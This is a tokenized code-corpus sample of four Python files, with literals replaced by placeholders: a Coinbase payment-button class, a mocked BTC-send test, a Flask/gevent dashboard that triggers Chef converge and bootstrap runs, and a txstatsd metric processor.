<s> from decimal import Decimal <EOL> from . util import namedtuple , optional <EOL> from . import CoinbaseAmount <EOL> class CoinbasePaymentButton ( namedtuple ( <EOL> '<STR_LIT>' , <EOL> optional = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def from_coinbase_dict ( cls , x ) : <EOL> kwargs = { <EOL> '<STR_LIT:id>' : x . get ( '<STR_LIT:code>' ) , <EOL> } <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> kwargs [ key ] = x . get ( key ) <EOL> if x . get ( '<STR_LIT>' ) : <EOL> prices = [ ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> s = x . get ( '<STR_LIT>' + str ( i ) ) <EOL> if s is not None : <EOL> prices . append ( Decimal ( s ) ) <EOL> kwargs [ '<STR_LIT>' ] = prices <EOL> kwargs [ '<STR_LIT>' ] = optional ( CoinbaseAmount . from_coinbase_dict ) ( <EOL> x . get ( '<STR_LIT>' ) ) <EOL> return CoinbasePaymentButton ( ** kwargs ) <EOL> def to_coinbase_dict ( self ) : <EOL> x = { } <EOL> if self . id is not None : <EOL> x [ '<STR_LIT:code>' ] = str ( self . id ) <EOL> for key in [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> value = getattr ( self , key ) <EOL> if value is not None : <EOL> x [ key ] = str ( value ) <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> value = getattr ( self , key ) <EOL> if value is not None : <EOL> x [ key ] = bool ( value ) <EOL> if self . price is not None : <EOL> x [ '<STR_LIT>' ] = str ( self . price . amount ) <EOL> x [ '<STR_LIT>' ] = str ( self . price . currency ) <EOL> if self . suggested_prices is not None : <EOL> x [ '<STR_LIT>' ] = True <EOL> for i , price in zip ( range ( <NUM_LIT:1> , <NUM_LIT:6> ) , self . suggested_prices ) : <EOL> x [ '<STR_LIT>' . format ( i ) ] = str ( price ) <EOL> return x </s>
<s> from sure import this <EOL> from unittest import TestCase <EOL> from datetime import datetime <EOL> from dateutil . tz import tzoffset <EOL> from coinbase import CoinbaseAmount , CoinbaseContact , CoinbaseTransaction <EOL> from . import account_setup <EOL> from . http_mocking import * <EOL> @ with_http_mocking <EOL> class SendBtcToBitcoinTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> mock_http ( '<STR_LIT>' , <EOL> response_body ) <EOL> def test_send_btc_to_bitcoinaddress_with_key ( self ) : <EOL> account = account_setup . with_key ( ) <EOL> tx = account . send ( <EOL> to_address = '<STR_LIT>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idem = '<STR_LIT:abc>' , <EOL> ) <EOL> this ( last_request_json ( ) ) . should . equal ( expected_request_json ) <EOL> this ( last_request_params ( ) ) . should . equal ( { <EOL> '<STR_LIT>' : [ account_setup . api_key ] , <EOL> } ) <EOL> this ( tx ) . should . equal ( expected_transaction ) <EOL> def test_send_btc_to_bitcoin_address_with_oauth ( self ) : <EOL> account = account_setup . with_oauth ( ) <EOL> tx = account . send ( <EOL> to_address = '<STR_LIT>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idem = '<STR_LIT:abc>' , <EOL> ) <EOL> this ( last_request_json ( ) ) . should . equal ( expected_request_json ) <EOL> this ( last_request_params ( ) ) . should . equal ( { } ) <EOL> this ( tx ) . should . equal ( expected_transaction ) <EOL> expected_request_json = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:to>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' , <EOL> } <EOL> } <EOL> response_body = """<STR_LIT>""" <EOL> expected_transaction = CoinbaseTransaction ( <EOL> id = '<STR_LIT>' , <EOL> created_at = datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:1> , <NUM_LIT:11> , <EOL> tzinfo = tzoffset ( None , - <NUM_LIT> ) ) , <EOL> notes = '<STR_LIT>' , <EOL> idem = '<STR_LIT:abc>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> status = CoinbaseTransaction . Status . pending , <EOL> request = False , <EOL> sender = CoinbaseContact ( <EOL> id = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> recipient_address = '<STR_LIT>' , <EOL> recipient_type = '<STR_LIT>' , <EOL> ) </s>
<s> import gevent <EOL> import gevent . monkey <EOL> import gevent . socket <EOL> gevent . monkey . patch_all ( ) <EOL> import subprocess <EOL> import fcntl <EOL> import os <EOL> import errno <EOL> import sys <EOL> import urllib <EOL> import distutils . spawn <EOL> import gevent . queue <EOL> import gevent . event <EOL> import ujson <EOL> import flask <EOL> import flask . ext . login <EOL> import chef <EOL> import logging <EOL> app = flask . Flask ( '<STR_LIT>' ) <EOL> app . config . update ( <EOL> DEBUG = True , <EOL> SECRET_KEY = '<STR_LIT>' , <EOL> LOG_FILE = None , <EOL> LOG_FORMAT = '<STR_LIT>' , <EOL> LOG_LEVEL = logging . INFO , <EOL> ENABLE_BOOTSTRAP = True , <EOL> ) <EOL> BOOTSTRAP_ENV = '<STR_LIT>' <EOL> if distutils . spawn . find_executable ( '<STR_LIT>' ) : <EOL> bootstrap_enabled = True <EOL> else : <EOL> bootstrap_enabled = False <EOL> login_manager = flask . ext . login . LoginManager ( app ) <EOL> api = chef . autoconfigure ( ) <EOL> def handler ( environ , start_response ) : <EOL> handled = False <EOL> path = environ [ '<STR_LIT>' ] <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> ws = environ . get ( '<STR_LIT>' ) <EOL> if ws : <EOL> handle_websocket ( ws , path [ <NUM_LIT:6> : ] ) <EOL> handled = True <EOL> if not handled : <EOL> return app ( environ , start_response ) <EOL> websockets = { } <EOL> def handle_websocket ( ws , env ) : <EOL> if not env : <EOL> env = BOOTSTRAP_ENV <EOL> s = websockets . get ( env ) <EOL> if s is None : <EOL> s = websockets [ env ] = [ ] <EOL> s . append ( ws ) <EOL> while True : <EOL> buf = ws . receive ( ) <EOL> if buf is None : <EOL> break <EOL> if ws in s : <EOL> s . remove ( ws ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def feed ( env = None ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> greenlets = { } <EOL> def processes ( env = None , node = None , only_executing = True ) : <EOL> env_greenlets = greenlets . get ( env ) <EOL> if env_greenlets is None : <EOL> return [ ] <EOL> elif node is None : <EOL> result = [ ] <EOL> for greenlet in env_greenlets . itervalues ( ) : <EOL> if not only_executing or not greenlet . ready ( ) : <EOL> result . append ( greenlet ) <EOL> return result <EOL> else : <EOL> greenlet = env_greenlets . get ( node ) <EOL> if greenlet is None or ( only_executing and greenlet . ready ( ) ) : <EOL> return [ ] <EOL> else : <EOL> return [ greenlet , ] <EOL> def broadcast ( env , packet ) : <EOL> sockets = websockets . get ( env ) <EOL> if sockets is not None : <EOL> packet = ujson . encode ( packet ) <EOL> for ws in list ( sockets ) : <EOL> if ws . socket is not None : <EOL> try : <EOL> ws . send ( packet ) <EOL> except gevent . socket . error : <EOL> if ws in sockets : <EOL> sockets . remove ( ws ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ flask . ext . login . login_required <EOL> def converge ( env , node = None ) : <EOL> if env == BOOTSTRAP_ENV : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( processes ( env , node , only_executing = True ) ) > <NUM_LIT:0> : <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> if node is not None : <EOL> nodes = { node : chef . Node ( node , api = api ) , } <EOL> else : <EOL> nodes = { row . object . name : row . object for row in chef . Search ( '<STR_LIT>' , '<STR_LIT>' + env , api = api ) } <EOL> get_command = lambda n : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , n [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return _run ( <EOL> nodes , <EOL> get_command , <EOL> env = env , <EOL> progress_status = '<STR_LIT>' , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def bootstrap_list ( ) : <EOL> if not bootstrap_enabled or not app . config . get ( '<STR_LIT>' ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> nodes = greenlets . get ( BOOTSTRAP_ENV , { } ) . keys ( ) <EOL> status , output , executing = get_env_status ( BOOTSTRAP_ENV , nodes , progress_status = '<STR_LIT>' ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> status = status , <EOL> output = output , <EOL> nodes = nodes , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ flask . ext . login . login_required <EOL> def bootstrap ( ip ) : <EOL> if not bootstrap_enabled or not app . config . get ( '<STR_LIT>' ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( processes ( BOOTSTRAP_ENV , ip , only_executing = True ) ) > <NUM_LIT:0> : <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> if len ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' % ( ip , ip , ip ) , api = api ) ) > <NUM_LIT:0> : <EOL> broadcast ( BOOTSTRAP_ENV , { '<STR_LIT:host>' : ip , '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> get_command = lambda ip : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ip ] <EOL> return _run ( <EOL> { ip : ip , } , <EOL> get_command , <EOL> env = BOOTSTRAP_ENV , <EOL> progress_status = '<STR_LIT>' , <EOL> ) <EOL> def _run ( nodes , get_command , env , progress_status ) : <EOL> env_greenlets = greenlets . get ( env ) <EOL> if env_greenlets is None : <EOL> greenlets [ env ] = env_greenlets = { } <EOL> for node in nodes : <EOL> try : <EOL> del env_greenlets [ node ] <EOL> except KeyError : <EOL> pass <EOL> for hostname in nodes : <EOL> node_object = nodes [ hostname ] <EOL> p = subprocess . Popen ( get_command ( node_object ) , shell = False , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> p . chunks = [ ] <EOL> fcntl . fcntl ( p . stdout , fcntl . F_SETFL , os . O_NONBLOCK ) <EOL> def read ( host , process ) : <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:status>' : progress_status } ) <EOL> while True : <EOL> chunk = None <EOL> try : <EOL> chunk = process . stdout . read ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> except IOError , e : <EOL> chunk = None <EOL> if e [ <NUM_LIT:0> ] != errno . EAGAIN : <EOL> raise <EOL> sys . exc_clear ( ) <EOL> if chunk : <EOL> process . chunks . append ( chunk ) <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:data>' : chunk , } ) <EOL> gevent . socket . wait_read ( process . stdout . fileno ( ) ) <EOL> process . stdout . close ( ) <EOL> process . wait ( ) <EOL> errors = process . stderr . read ( ) <EOL> process . chunks . append ( errors ) <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:status>' : '<STR_LIT>' if process . returncode == <NUM_LIT:0> else '<STR_LIT:error>' , '<STR_LIT:data>' : errors } ) <EOL> if len ( processes ( env , only_executing = True ) ) <= <NUM_LIT:1> : <EOL> broadcast ( env , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> return process . returncode <EOL> greenlet = gevent . spawn ( read , host = hostname , process = p ) <EOL> greenlet . process = p <EOL> env_greenlets [ hostname ] = greenlet <EOL> broadcast ( env , { '<STR_LIT:status>' : progress_status } ) <EOL> return ujson . encode ( { '<STR_LIT:status>' : progress_status if len ( nodes ) > <NUM_LIT:0> else '<STR_LIT>' } ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> @ flask . ext . login . login_required <EOL> def index ( ) : <EOL> envs = chef . Environment . list ( api = api ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> envs = envs . itervalues ( ) , <EOL> bootstrap_enabled = bootstrap_enabled and app . config . get ( '<STR_LIT>' ) , <EOL> ) <EOL> def get_env_status ( env , nodes , progress_status ) : <EOL> status = { } <EOL> output = { } <EOL> executing = False <EOL> env_greenlets = greenlets . get ( env ) <EOL> if env_greenlets is None : <EOL> env_greenlets = greenlets [ env ] = { } <EOL> for node in nodes : <EOL> greenlet = env_greenlets . get ( node ) <EOL> if greenlet is None : <EOL> status [ node ] = '<STR_LIT>' <EOL> output [ node ] = '<STR_LIT>' <EOL> else : <EOL> s = progress_status <EOL> if greenlet . ready ( ) : <EOL> s = '<STR_LIT>' if greenlet . value == <NUM_LIT:0> else '<STR_LIT:error>' <EOL> else : <EOL> executing = True <EOL> status [ node ] = s <EOL> output [ node ] = '<STR_LIT>' . join ( greenlet . process . chunks ) <EOL> return status , output , executing <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def env ( env ) : <EOL> if env == BOOTSTRAP_ENV : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' + env , api = api ) ) == <NUM_LIT:0> : <EOL> flask . abort ( <NUM_LIT> ) <EOL> nodes = list ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' % env , api = api ) ) <EOL> nodes . sort ( key = lambda n : n . object . name ) <EOL> status , output , converging = get_env_status ( env , ( n . object . name for n in nodes ) , progress_status = '<STR_LIT>' ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> env = env , <EOL> converging = converging , <EOL> status = status , <EOL> output = output , <EOL> nodes = nodes , <EOL> ) <EOL> @ login_manager . user_loader <EOL> class User ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> return self . id <EOL> login_manager . login_view = '<STR_LIT>' <EOL> @ app . template_filter ( '<STR_LIT>' ) <EOL> def urlquote ( url ) : <EOL> return urllib . quote ( url , '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> request = flask . request <EOL> if flask . ext . login . current_user . is_authenticated ( ) : <EOL> return flask . redirect ( request . args . get ( '<STR_LIT>' ) or flask . url_for ( '<STR_LIT:index>' ) ) <EOL> username = request . form . get ( '<STR_LIT:username>' ) <EOL> remember = request . form . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> if username is not None : <EOL> password = request . form . get ( '<STR_LIT:password>' ) <EOL> auth_result = ujson . decode ( api . request ( '<STR_LIT:POST>' , '<STR_LIT>' , data = ujson . encode ( { '<STR_LIT:name>' : username , '<STR_LIT:password>' : password } ) ) ) <EOL> if auth_result . get ( '<STR_LIT:name>' ) == username and auth_result . get ( '<STR_LIT>' ) : <EOL> flask . ext . login . login_user ( User ( username ) , remember = remember ) <EOL> return flask . redirect ( request . args . get ( '<STR_LIT>' ) or flask . url_for ( '<STR_LIT:index>' ) ) <EOL> else : <EOL> return flask . render_template ( '<STR_LIT>' , <EOL> username = username , <EOL> error = True , <EOL> remember = remember , <EOL> next = request . args . get ( '<STR_LIT>' ) , <EOL> ) <EOL> return flask . render_template ( '<STR_LIT>' , <EOL> username = None , <EOL> error = False , <EOL> remember = remember , <EOL> next = request . args . get ( '<STR_LIT>' ) , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def logout ( ) : <EOL> flask . ext . login . logout_user ( ) <EOL> return flask . redirect ( flask . url_for ( '<STR_LIT>' ) ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def favicon ( ) : <EOL> return flask . send_from_directory ( <EOL> os . path . join ( app . root_path , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> mimetype = '<STR_LIT>' , <EOL> ) </s>
<s> from collections import deque <EOL> import re <EOL> import time <EOL> import logging <EOL> from twisted . python import log <EOL> from txstatsd . metrics . metermetric import MeterMetricReporter <EOL> SPACES = re . compile ( "<STR_LIT>" ) <EOL> SLASHES = re . compile ( "<STR_LIT>" ) <EOL> NON_ALNUM = re . compile ( "<STR_LIT>" ) <EOL> RATE = re . compile ( "<STR_LIT>" ) <EOL> def normalize_key ( key ) : <EOL> """<STR_LIT>""" <EOL> key = SPACES . sub ( "<STR_LIT:_>" , key ) <EOL> key = SLASHES . sub ( "<STR_LIT:->" , key ) <EOL> key = NON_ALNUM . sub ( "<STR_LIT>" , key ) <EOL> return key <EOL> class BaseMessageProcessor ( object ) : <EOL> def process ( self , message ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if not "<STR_LIT::>" in message : <EOL> return self . fail ( message ) <EOL> key , data = message . strip ( ) . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> if not "<STR_LIT:|>" in data : <EOL> return self . fail ( message ) <EOL> fields = data . split ( "<STR_LIT:|>" ) <EOL> if len ( fields ) < <NUM_LIT:2> or len ( fields ) > <NUM_LIT:3> : <EOL> return self . fail ( message ) <EOL> key = normalize_key ( key ) <EOL> metric_type = fields [ <NUM_LIT:1> ] <EOL> return self . process_message ( message , metric_type , key , fields ) <EOL> def rebuild_message ( self , metric_type , key , fields ) : <EOL> return key + "<STR_LIT::>" + "<STR_LIT:|>" . join ( fields ) <EOL> def fail ( self , message ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( "<STR_LIT>" % message , logLevel = logging . DEBUG ) <EOL> class MessageProcessor ( BaseMessageProcessor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , time_function = time . time , plugins = None ) : <EOL> self . time_function = time_function <EOL> self . stats_prefix = "<STR_LIT>" <EOL> self . internal_metrics_prefix = "<STR_LIT>" <EOL> self . count_prefix = "<STR_LIT>" <EOL> self . timer_prefix = self . stats_prefix + "<STR_LIT>" <EOL> self . gauge_prefix = self . stats_prefix + "<STR_LIT>" <EOL> self . process_timings = { } <EOL> self . by_type = { } <EOL> self . last_flush_duration = <NUM_LIT:0> <EOL> self . last_process_duration = <NUM_LIT:0> <EOL> self . timer_metrics = { } <EOL> self . counter_metrics = { } <EOL> self . gauge_metrics = deque ( ) <EOL> self . meter_metrics = { } <EOL> self . plugins = { } <EOL> self . plugin_metrics = { } <EOL> if plugins is not None : <EOL> for plugin in plugins : <EOL> self . plugins [ plugin . metric_type ] = plugin <EOL> def get_metric_names ( self ) : <EOL> """<STR_LIT>""" <EOL> metrics = set ( ) <EOL> metrics . update ( self . timer_metrics . keys ( ) ) <EOL> metrics . update ( self . counter_metrics . keys ( ) ) <EOL> metrics . update ( v for k , v in self . gauge_metrics ) <EOL> metrics . update ( self . meter_metrics . keys ( ) ) <EOL> metrics . update ( self . plugin_metrics . keys ( ) ) <EOL> return list ( metrics ) <EOL> def process_message ( self , message , metric_type , key , fields ) : <EOL> """<STR_LIT>""" <EOL> start = self . time_function ( ) <EOL> if metric_type == "<STR_LIT:c>" : <EOL> self . process_counter_metric ( key , fields , message ) <EOL> elif metric_type == "<STR_LIT>" : <EOL> self . process_timer_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type == "<STR_LIT:g>" : <EOL> self . process_gauge_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type == "<STR_LIT:m>" : <EOL> self . process_meter_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type in self . plugins : <EOL> self . process_plugin_metric ( metric_type , key , fields , message ) <EOL> else : <EOL> return self . fail ( message ) <EOL> self . process_timings . setdefault ( metric_type , <NUM_LIT:0> ) <EOL> self . process_timings [ metric_type ] += self . time_function ( ) - start <EOL> self . by_type . setdefault ( metric_type , <NUM_LIT:0> ) <EOL> self . by_type [ metric_type ] += <NUM_LIT:1> <EOL> def get_message_prefix ( self , kind ) : <EOL> return "<STR_LIT>" + kind <EOL> def process_plugin_metric ( self , metric_type , key , items , message ) : <EOL> if not key in self . plugin_metrics : <EOL> factory = self . plugins [ metric_type ] <EOL> metric = factory . build_metric ( <EOL> self . get_message_prefix ( factory . name ) , <EOL> name = key , wall_time_func = self . time_function ) <EOL> self . plugin_metrics [ key ] = metric <EOL> self . plugin_metrics [ key ] . process ( items ) <EOL> def process_timer_metric ( self , key , duration , message ) : <EOL> try : <EOL> duration = float ( duration ) <EOL> except ( TypeError , ValueError ) : <EOL> return self . fail ( message ) <EOL> self . compose_timer_metric ( key , duration ) <EOL> def compose_timer_metric ( self , key , duration ) : <EOL> if key not in self . timer_metrics : <EOL> self . timer_metrics [ key ] = [ ] <EOL> self . timer_metrics [ key ] . append ( duration ) <EOL> def process_counter_metric ( self , key , composite , message ) : <EOL> try : <EOL> value = float ( composite [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> return self . fail ( message ) <EOL> rate = <NUM_LIT:1> <EOL> if len ( composite ) == <NUM_LIT:3> : <EOL> match = RATE . match ( composite [ <NUM_LIT:2> ] ) <EOL> if match is None : <EOL> return self . fail ( message ) <EOL> rate = match . group ( <NUM_LIT:1> ) <EOL> self . compose_counter_metric ( key , value , rate ) <EOL> def compose_counter_metric ( self , key , value , rate ) : <EOL> if key not in self . counter_metrics : <EOL> self . counter_metrics [ key ] = <NUM_LIT:0> <EOL> self . counter_metrics [ key ] += value * ( <NUM_LIT:1> / float ( rate ) ) <EOL> def process_gauge_metric ( self , key , composite , message ) : <EOL> values = composite . split ( "<STR_LIT::>" ) <EOL> if not len ( values ) == <NUM_LIT:1> : <EOL> return self . fail ( message ) <EOL> try : <EOL> value = float ( values [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> self . fail ( message ) <EOL> self . compose_gauge_metric ( key , value ) <EOL> def compose_gauge_metric ( self , key , value ) : <EOL> metric = [ value , key ] <EOL> self . gauge_metrics . append ( metric ) <EOL> def process_meter_metric ( self , key , composite , message ) : <EOL> values = composite . split ( "<STR_LIT::>" ) <EOL> if not len ( values ) == <NUM_LIT:1> : <EOL> return self . fail ( message ) <EOL> try : <EOL> value = float ( values [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> self . fail ( message ) <EOL> self . compose_meter_metric ( key , value ) <EOL> def compose_meter_metric ( self , key , value ) : <EOL> if not key in self . meter_metrics : <EOL> metric = MeterMetricReporter ( key , self . time_function , <EOL> prefix = "<STR_LIT>" ) <EOL> self . meter_metrics [ key ] = metric <EOL> self . meter_metrics [ key ] . mark ( value ) <EOL> def flush ( self , interval = <NUM_LIT> , percent = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> per_metric = { } <EOL> num_stats = <NUM_LIT:0> <EOL> interval = interval / <NUM_LIT:1000> <EOL> timestamp = int ( self . time_function ( ) ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_counter_metrics ( interval , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_timer_metrics ( percent , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_gauge_metrics ( timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_meter_metrics ( timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_plugin_metrics ( interval , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> for metrics in self . flush_metrics_summary ( num_stats , per_metric , <EOL> timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> def flush_counter_metrics ( self , interval , timestamp ) : <EOL> for key , count in self . counter_metrics . iteritems ( ) : <EOL> self . counter_metrics [ key ] = <NUM_LIT:0> <EOL> value = count / interval <EOL> yield ( ( self . stats_prefix + key , value , timestamp ) , <EOL> ( self . count_prefix + key , count , timestamp ) ) <EOL> def flush_timer_metrics ( self , percent , timestamp ) : <EOL> threshold_value = ( ( <NUM_LIT:100> - percent ) / <NUM_LIT> ) <EOL> for key , timers in self . timer_metrics . iteritems ( ) : <EOL> count = len ( timers ) <EOL> if count > <NUM_LIT:0> : <EOL> self . timer_metrics [ key ] = [ ] <EOL> timers . sort ( ) <EOL> lower = timers [ <NUM_LIT:0> ] <EOL> upper = timers [ - <NUM_LIT:1> ] <EOL> count = len ( timers ) <EOL> mean = lower <EOL> threshold_upper = upper <EOL> if count > <NUM_LIT:1> : <EOL> index = count - int ( round ( threshold_value * count ) ) <EOL> timers = timers [ : index ] <EOL> threshold_upper = timers [ - <NUM_LIT:1> ] <EOL> mean = sum ( timers ) / index <EOL> items = { "<STR_LIT>" : mean , <EOL> "<STR_LIT>" : upper , <EOL> "<STR_LIT>" % percent : threshold_upper , <EOL> "<STR_LIT>" : lower , <EOL> "<STR_LIT>" : count } <EOL> yield sorted ( ( self . timer_prefix + key + item , value , timestamp ) <EOL> for item , value in items . iteritems ( ) ) <EOL> def flush_gauge_metrics ( self , timestamp ) : <EOL> for metric in self . gauge_metrics : <EOL> value = metric [ <NUM_LIT:0> ] <EOL> key = metric [ <NUM_LIT:1> ] <EOL> yield ( ( self . gauge_prefix + key + "<STR_LIT>" , value , timestamp ) , ) <EOL> def flush_meter_metrics ( self , timestamp ) : <EOL> for metric in self . meter_metrics . itervalues ( ) : <EOL> messages = metric . report ( timestamp ) <EOL> yield messages <EOL> def flush_plugin_metrics ( self , interval , timestamp ) : <EOL> for metric in self . plugin_metrics . itervalues ( ) : <EOL> messages = metric . flush ( interval , timestamp ) <EOL> yield messages <EOL> def flush_metrics_summary ( self , num_stats , per_metric , timestamp ) : <EOL> yield ( ( self . internal_metrics_prefix + "<STR_LIT>" , <EOL> num_stats , timestamp ) , ) <EOL> self . last_flush_duration = <NUM_LIT:0> <EOL> for name , ( value , duration ) in per_metric . iteritems ( ) : <EOL> yield ( ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % name , <EOL> value , timestamp ) , <EOL> ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % name , <EOL> duration * <NUM_LIT:1000> , timestamp ) ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( value , name , duration ) ) <EOL> self . last_flush_duration += duration <EOL> self . last_process_duration = <NUM_LIT:0> <EOL> for metric_type , duration in self . process_timings . iteritems ( ) : <EOL> yield ( ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % <EOL> metric_type , self . by_type [ metric_type ] , timestamp ) , <EOL> ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % <EOL> metric_type , duration * <NUM_LIT:1000> , timestamp ) ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( self . by_type [ metric_type ] , metric_type , duration ) ) <EOL> self . last_process_duration += duration <EOL> self . process_timings . clear ( ) <EOL> self . by_type . clear ( ) </s>
